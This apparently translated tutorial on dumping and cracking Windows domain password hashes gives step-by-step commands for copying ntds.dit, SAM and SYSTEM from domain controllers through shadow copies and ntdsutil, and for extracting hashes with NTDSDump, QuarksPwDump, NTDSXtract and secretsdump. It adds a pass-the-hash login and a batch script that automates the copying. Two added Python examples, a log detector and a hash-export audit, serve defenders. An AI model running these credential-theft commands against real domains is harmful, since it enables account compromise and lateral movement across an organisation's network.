Summary of experience with dumping and cracking domain hashes


1. Copying the domain database with vssown.vbs:

1.1 Upload vssown.vbs

Upload cscript.exe and vssown.vbs to the domain server.

1.2 Create a snapshot

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters        //returns the NTDS path; the default is c:\Windows\NTDS\ntds.dit
cd 桌面                                       //change to the Desktop folder where vssown.vbs was uploaded
cscript //nologo vssown.vbs /start          //start the Volume Shadow Copy service
cscript //nologo vssown.vbs /status         //check the service status
cscript //nologo vssown.vbs /create C       //create a shadow copy of the C: volume
cscript //nologo vssown.vbs /list >d:\jy.txt   //list the snapshots created and write the output to d:\jy.txt

1.3 Obtain the domain database ntds.dit

The HarddiskVolumeShadowCopy number used below (5 here) is the one reported by /list.

copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit d:               //copy ntds.dit to D:; ntds.dit is not always in the default path, so query the registry (above) for its location
copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM d:      //copy the SYSTEM hive to D:
copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM d:         //copy the SAM hive to D:
cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D}                  //delete the shadow copy

2. Copying the domain database with vshadow.exe:

vshadow.exe -exec=%ComSpec% C:       //create a shadow copy of the C: volume and open a command shell while it is live
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\system  d:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit           d:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM    d:

3. Copying the domain database with vssadmin:

vssadmin create shadow /for=c:     //create a shadow copy of the C: volume
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit             d:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM   d:\system.hive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM        d:\sam

4. Exporting domain database hashes with NTDSDump:

4.1 ntdsdump command help

ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC]

-f    path to ntds.dit
-k    optional SYSKEY in hexadecimal
-s    optional path to system.hiv (the SYSTEM hive)
-h    also export password history
-t    output format, LC or JOHN
-o    write the output to the given file

4.2 Quick hash export with ntdsdump

NTDSDump.exe -f ntds.dit -s SYSTEM -h -t john -o SecPulseHash.txt     //quick hash export in John format (use -t lc for LC format)

5. Exporting hashes with ntdsutil.exe + QuarksPwDump.exe:

5.1 quarkspwdump command help

-dhl   dump local hashes
-dhdc  dump domain controller hashes from memory
-dhd   dump domain controller hashes; an NTDS file must be specified
-db    dump BitLocker information; an NTDS file must be specified
-nt    the ntds file to read
-hist  include password history (optional)
-t     output type (optional); the default is John format
-o     write the output to a local file

QuarksPwDumpv0.2b.exe -dhl -o bk.txt  //dump local hashes to bk.txt in the current directory
quarks-pwdump.exe --dump-hash-domain --with-history //dump the hashes, including history, stored on this domain controller
quarks-pwdump.exe --dump-bitlocker --output c:\bitlocker.txt --ntds-file c:\ntds.dit

5.2 Create a snapshot:

ntdsutil snapshot "activate instance ntds" create quit quit

5.3 Mount the domain snapshot with ntdsutil:

ntdsutil snapshot "mount {a0455f6c-40c3-4b56-80a0-80261471522c}" quit quit

快照 {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已掛接為 C:\$SNAP_201212082315_VOLUMEC$\        //ntdsutil reports that the snapshot has been mounted as C:\$SNAP_201212082315_VOLUMEC$\

5.4 Copy from the snapshot

copy C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit  c:\ntds.dit

5.5 Unmount the snapshot:

ntdsutil snapshot "unmount {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit

5.6 Delete the snapshot

ntdsutil snapshot "delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit

ntdsutil.exe + PWPR (Passcape Windows Password Recovery)

5.7 Exporting ntds.dit and SYSTEM with ntdsutil

The same steps, run interactively inside ntdsutil; the copy commands are run from a separate command window while the snapshot is mounted:

    #ntdsutil
    #snapshot
    #activate instance ntds
    #create
    #mount {GUID}
    copy c:\{mount point}\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit    (can also be copied manually, from a new window)
    copy c:\{mount point}\WINDOWS\system32\config\system c:\system
    #unmount {GUID}
    #delete {GUID}
    #quit
    #quit

Finally, crack the hashes locally on a GPU with PWPR (Passcape Windows Password Recovery).

5.8 Exporting hashes on the domain controller:

QuarksPwDump.exe --dump-hash-domain --ntds-file  c:\ntds.dit  --output  SecPulseHash.txt    //best run on the domain controller itself; a copy downloaded elsewhere will error out
QuarksPwDump.exe -dhd -hist -nt ntds.dit -o log.txt  //repair and dump an ntds.dit that was downloaded offline

5.9 Exporting the SYSTEM file

reg save hklm\system system.hive   //export the SYSTEM hive

5.10 Exporting hashes locally from an offline download

quarks-pwdump.exe --dump-hash-domain  --ntds-file  C:\pentest\NTDS.dit -sf C:\pentest\SYSTEM -o hashes.txt  //export the hashes from ntds.dit offline

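Every method in sections 1 to 5 leaves the same kind of process-creation trace on the domain controller: a snapshot being created (vssadmin, vshadow.exe, vssown.vbs or ntdsutil snapshot), a copy command whose path names ntds.dit under \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy or a $SNAP_ mount point, and a reg save or shadow-copy read of the SYSTEM hive. The following is an added example, not code from the original article, of a small detector that scans process-creation records for exactly those patterns. The input is a constructed Sysmon-style key=value layout; the field names (EventID, User, Image, CommandLine) are an assumption about the log pipeline and the sample lines are made up.

```python
"""Flag shadow-copy and ntdsutil activity aimed at ntds.dit in process-creation logs.

Added example (not from the original article). The key=value record layout
and field names are assumptions; adapt parse_record() to your pipeline.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample records: one benign backup check, one unrelated process,
# and the command lines from sections 1-5 of the article.
SAMPLE_LOG = r"""
EventID=1 User=CORP\backupsvc Image=C:\Windows\System32\vssadmin.exe CommandLine=vssadmin list shadows
EventID=1 User=CORP\jdoe Image=C:\Windows\System32\vssadmin.exe CommandLine=vssadmin create shadow /for=c:
EventID=1 User=CORP\jdoe Image=C:\Windows\System32\cmd.exe CommandLine=copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit d:\ntds.dit
EventID=1 User=CORP\jdoe Image=C:\Windows\System32\cmd.exe CommandLine=copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM d:\system.hive
EventID=1 User=CORP\jdoe Image=C:\Windows\System32\cscript.exe CommandLine=cscript //nologo vssown.vbs /create C
EventID=1 User=CORP\jdoe Image=C:\Users\jdoe\Desktop\vshadow.exe CommandLine=vshadow.exe -exec=C:\Windows\system32\cmd.exe C:
EventID=1 User=CORP\admin Image=C:\Windows\System32\ntdsutil.exe CommandLine=ntdsutil snapshot "activate instance ntds" create quit quit
EventID=1 User=CORP\admin Image=C:\Windows\System32\cmd.exe CommandLine=copy C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
EventID=1 User=CORP\admin Image=C:\Windows\System32\reg.exe CommandLine=reg save hklm\system system.hive
EventID=1 User=CORP\jdoe Image=C:\Windows\System32\notepad.exe CommandLine=notepad.exe readme.txt
"""

# Image paths containing spaces are not handled by this simple layout (assumption).
LINE_RE = re.compile(
    r"^EventID=(?P<event>\S+) User=(?P<user>\S+) Image=(?P<image>\S+) CommandLine=(?P<cmd>.*)$"
)

# Each rule gets (image basename, command line), both lower-cased.
RULES: List[Tuple[str, Callable[[str, str], bool]]] = [
    ("shadow_copy_created_vssadmin",
     lambda img, cl: img == "vssadmin.exe" and "create" in cl and "shadow" in cl),
    ("shadow_copy_created_vshadow",
     lambda img, cl: img == "vshadow.exe"),
    ("shadow_copy_created_vssown",
     lambda img, cl: img in ("cscript.exe", "wscript.exe") and "vssown.vbs" in cl and "/create" in cl),
    ("ntdsutil_snapshot_created",
     lambda img, cl: img == "ntdsutil.exe" and "snapshot" in cl and "create" in cl),
    # ntds.dit read through a shadow-copy device path or an ntdsutil $SNAP_ mount point.
    ("ntds_dit_copied_from_snapshot",
     lambda img, cl: "ntds.dit" in cl and ("harddiskvolumeshadowcopy" in cl or "$snap_" in cl)),
    # SYSTEM hive taken with reg save or read from a snapshot (needed to decrypt the hashes).
    ("system_hive_exported",
     lambda img, cl: (img == "reg.exe" and "save" in cl and r"hklm\system" in cl)
                     or (r"\config\system" in cl and ("harddiskvolumeshadowcopy" in cl or "$snap_" in cl))),
]


def parse_record(line: str) -> Optional[Dict[str, str]]:
    """Split one key=value record into its fields; None for lines that do not fit."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per (record, matching rule) for process-creation events."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if not rec or rec["event"] != "1":
            continue
        img = rec["image"].rsplit("\\", 1)[-1].lower()
        cl = rec["cmd"].lower()
        for name, pred in RULES:
            if pred(img, cl):
                hits.append({"rule": name, "user": rec["user"], "command": rec["cmd"]})
    return hits


def summarize(hits: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Distinct rules per account; snapshot creation followed by an ntds.dit copy
    and a SYSTEM export from the same account is the strong signal."""
    per_user: Dict[str, set] = {}
    for h in hits:
        per_user.setdefault(h["user"], set()).add(h["rule"])
    return {user: sorted(rules) for user, rules in per_user.items()}


def run_sample() -> List[Dict[str, str]]:
    return detect(SAMPLE_LOG.strip().splitlines())


if __name__ == "__main__":
    for user, rules in summarize(run_sample()).items():
        print(f"{user}: {', '.join(rules)}")
```

The benign `vssadmin list shadows` from the backup account produces no hit, while both sequences in the sample (vssadmin/vssown/vshadow from one account, ntdsutil from another) trigger the snapshot, ntds.dit and SYSTEM-hive rules together, which is the combination to alert on rather than any single command.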
6. Exporting domain database hashes with libesedb + NTDSXtract:

6.1 Prerequisites for libesedb on Ubuntu:

sudo apt install autoconf automake autopoint libtool pkg-config   //install the build prerequisites

6.2 Install libesedb:

git clone https://github.com/libyal/libesedb.git
cd libesedb/
./synclibs.sh
./autogen.sh
./configure
make
sudo make install     //installs to /usr/local/bin by default
ldconfig

6.3 Split the ntds.dit database into tables

root@kali:/usr/local/bin# esedbexport -m tables /opt/ntds.dit   //after downloading ntds.dit, SAM and SYSTEM into the hashdumpwork directory on the local Kali desktop, export the tables; a folder named ntds.dit.export is created in the directory

6.4 Install NTDSXtract

wget https://github.com/csababarta/ntdsxtract/archive/e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip
unzip e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip
cd ntdsxtract-e2fc6470cf54d9151bed394ce9ad3cd25be7c262/
python setup.py install

6.5 Export hashes with the ntds script

root@kali:# python dsusers.py /usr/local/bin/ntds.dit.export/datatable.4 /usr/local/bin/ntds.dit.export/link_table.7 /root/Desktop/hashdumpwork   --syshive /root/Desktop/SYSTEM --passwordhashes --lmoutfile /root/Desktop/lm-out.txt --ntoutfile /root/Desktop/nt-out.txt --pwdformat ophc    //use --pwdformat john for John format instead of ophc

7. Exporting domain database hashes with Impacket's secretsdump:

python secretsdump.py  -ntds  /opt/ntds.dit  -system  /opt/system.hive  local

7.1 Pass-the-hash login with Impacket's secretsdump:

python secretsdump.py  -hashes  0000000000000000000000000:f9bccbbbdkkkkkkddjjjkkjfjjggj bk/bk.org@192.168.1.100

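NTDSDump's LC output (section 4) and secretsdump's local mode (section 7) both write one record per account in the pwdump layout user:rid:LM-hash:NT-hash:::, with password-history entries named user_history0, user_history1 and so on. The value a tool writes in the LM field when no LM hash is stored is the fixed marker aad3b435b51404eeaad3b435b51404ee. The following is an added example, not from the original article or any of these tools, of the audit a defender runs over such an export after an authorised extraction: which accounts still carry an LM hash (LM storage has not been disabled for them) and which accounts share an NT hash (the same password). The sample dump is constructed and contains no real hashes.

```python
"""Audit a pwdump/LC-format hash export for LM storage and password reuse.

Added example (not from the article). The record layout user:rid:lm:nt:::
is the pwdump format written by NTDSDump (-t LC) and secretsdump; history
entries carry a user_historyN suffix. The sample data is constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

# Fixed marker written in the LM field when no LM hash is stored for the account.
NO_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
HISTORY_RE = re.compile(r"_history\d+$")
HEX = set("0123456789abcdefABCDEF")


class HashRecord(NamedTuple):
    user: str      # account name with any _historyN suffix removed
    rid: int
    lm: str        # 32 hex chars, lower-cased
    nt: str        # 32 hex chars, lower-cased
    history: bool  # True for a past-password entry


# Constructed sample dump; the hash values are placeholders, not real credentials.
SAMPLE_DUMP = """
# constructed sample export
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
CORP\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
CORP\\jdoe:1108:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
CORP\\legacyapp:1120:0123456789abcdef0123456789abcdef:44444444444444444444444444444444:::
CORP\\jdoe_history0:1108:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555:::
"""


def _is_hash(value: str) -> bool:
    return len(value) == 32 and all(c in HEX for c in value)


def parse_pwdump(text: str) -> Tuple[List[HashRecord], List[str]]:
    """Parse pwdump lines; malformed lines are returned separately, not silently dropped."""
    records: List[HashRecord] = []
    bad: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            bad.append(line)
            continue
        user, rid, lm, nt = parts[:4]
        if not (rid.isdigit() and _is_hash(lm) and _is_hash(nt)):
            bad.append(line)
            continue
        m = HISTORY_RE.search(user)
        base = user[:m.start()] if m else user
        records.append(HashRecord(base, int(rid), lm.lower(), nt.lower(), m is not None))
    return records, bad


def audit(records: List[HashRecord]) -> Dict[str, object]:
    """Report accounts still storing an LM hash and accounts sharing an NT hash."""
    current = [r for r in records if not r.history]
    lm_stored = sorted(r.user for r in current if r.lm != NO_LM_HASH)
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for r in current:
        by_nt[r.nt].append(r.user)
    shared_nt = {h: sorted(users) for h, users in by_nt.items() if len(users) > 1}
    return {
        "accounts": len(current),
        "lm_stored": lm_stored,
        "shared_nt": shared_nt,
        "history_entries": sum(1 for r in records if r.history),
    }


if __name__ == "__main__":
    recs, malformed = parse_pwdump(SAMPLE_DUMP)
    print(audit(recs))
    print("malformed lines:", malformed)
```

History entries are excluded from the reuse check so that an account is not reported as sharing a password with its own past; they are counted separately, because exporting history (the -h / --with-history options above) is what makes that check possible.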
8. Appendix

Appendix: batch script for exporting the ntds.dit file. It wraps vshadow.exe and calls itself back while the shadow copy is live; %1 is the file to copy (for example C:\Windows\NTDS\ntds.dit) and %2 the destination path.

setlocal
@REM test if we are called by VSHADOW
if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK
@REM
@REM Get the source and destination path
@REM
set SOURCE_DRIVE_LETTER=%~d1
set SOURCE_RELATIVE_PATH=%~pnx1
set DESTINATION_PATH=%2
@REM
@REM Create the shadow copy - and generate env variables into a temporary script.
@REM
@REM Then, while the shadow is still live
@REM recursively execute the same script.
@REM
@echo ...Determine the scripts to be executed/generated...
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo ...Creating the shadow copy...
%~dp0\vshadow.exe -script=%TEMP_GENERATED_SCRIPT% -exec=%CALLBACK_SCRIPT% %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@REM
@REM This generated script should set the SHADOW_DEVICE_1 env variable
@REM
@echo ...Obtaining the shadow copy device name...
call %TEMP_GENERATED_SCRIPT%
@REM
@REM This should copy the file to the right location
@REM
@echo ...Copying from the shadow copy to the destination path...
copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%

 

  

 

